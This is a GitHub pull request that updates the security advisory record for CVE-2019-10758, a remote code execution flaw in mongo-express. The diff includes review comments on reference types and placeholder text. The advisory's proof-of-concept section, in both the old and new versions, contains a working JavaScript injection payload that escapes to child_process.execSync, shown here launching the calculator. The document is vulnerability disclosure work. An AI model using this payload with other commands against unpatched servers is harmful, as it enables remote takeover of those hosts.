[GHSA-h47j-hc6x-h3qq] Remote Code Execution Vulnerability in NPM mongo-express #5855

Merged
@@ -1,13 +1,13 @@
{
"schema_version": "1.4.0",
"id": "GHSA-h47j-hc6x-h3qq",
"modified": "2025-02-07T18:01:54Z",
"modified": "2025-02-07T18:01:55Z",
"published": "2019-12-30T19:30:31Z",
"aliases": [
"CVE-2019-10758"
],
"summary": "Remote Code Execution Vulnerability in NPM mongo-express",
"details": "### Impact\n\nRemote code execution on the host machine by any authenticated user.\n\n### Proof Of Concept\n\nLaunching mongo-express on a Mac, pasting the following into the \"create index\" field will pop open the Mac calculator:\n\n```javascript\nthis.constructor.constructor(\"return process\")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')\n```\n\n### Patches\nUsers should upgrade to version `0.54.0`\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n[Snyk Security Advisory](https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215)\n[CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10758)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [example link to repo](http://example.com)\n* Email us at [example email address](mailto:[email protected])\n\n#### Thanks\n\n@JLLeitschuh for finding and reporting this vulnerability",
"details": "### Impact\n\nRemote code execution on the host machine by any authenticated user.\n\nThis vulnerability is on the CISA Known Exploited Vulnerabilities (KEV) list.\n\n### Proof Of Concept\n\nLaunching mongo-express on a Mac, pasting the following into the \"create index\" field will pop open the Mac calculator:\n\n```javascript\nthis.constructor.constructor(\"return process\")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')\n```\n\n### Patches\nUsers should upgrade to version `0.54.0`\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n- [Snyk Security Advisory](https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215)\n- [CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10758)\n- https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2\n\n#### Thanks\n\n@JLLeitschuh for finding and reporting this vulnerability",
"severity": [
{
"type": "CVSS_V3",
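Review bot: the rewritten `"details"` line still carries the advisory-template placeholder under `### Workarounds` (`_Is there a way for users to fix or remediate the vulnerability without upgrading?_`); either state an actual mitigation (for example, restricting who can authenticate to mongo-express until 0.54.0 is deployed) or drop the heading, because a rhetorical question shipped to users implies a workaround exists when none is documented. The new sentence "This vulnerability is on the CISA Known Exploited Vulnerabilities (KEV) list." is also asserted without a supporting link; consider adding the KEV catalog URL under `### References` alongside the Snyk, CVE and commit entries so the claim is verifiable from the advisory itself. Removing the `example.com` / `example email address` contact stubs from the old text is the right call.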
@@ -52,6 +52,14 @@
"type": "WEB",
"url": "https://github.com/mongo-express/mongo-express/commit/7d365141deadbd38fa961cd835ce68eab5731494"
},
{
"type": "WEB",
"url": "https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2"
},
{
"type": "PACKAGE",
"url": "https://github.com/mongo-express/mongo-express/blob/ea02b364d43f179f191fc91fb9962efdb0843a8d/lib/bson.js#L60"
Copilot AI Jul 25, 2025:

The PACKAGE reference should point to the repository root rather than a specific file and line. Consider using "https://github.com/mongo-express/mongo-express" as the URL for the PACKAGE type reference.

Suggested change:
- "url": "https://github.com/mongo-express/mongo-express/blob/ea02b364d43f179f191fc91fb9962efdb0843a8d/lib/bson.js#L60"
+ "url": "https://github.com/mongo-express/mongo-express"

},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215"
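Review bot: the added `"type": "PACKAGE"` entry points at a file blob pinned to one commit (`.../blob/ea02b364d43f179f191fc91fb9962efdb0843a8d/lib/bson.js#L60`); in the OSV schema a PACKAGE reference is the package's home or source repository, so this should be `https://github.com/mongo-express/mongo-express`, and the blob link, which is useful as a pointer to the vulnerable code path, can stay in the list as a `"type": "WEB"` reference instead of being lost. Separately, the new `d8c9bda46a204ecba1d35558452685cd0674e6f2` commit entry is typed `WEB` like the existing `7d365141...` commit; if these are the remediation commits, OSV's `FIX` type is the accurate classification and lets consumers distinguish the patch from the Snyk and CVE write-ups that follow.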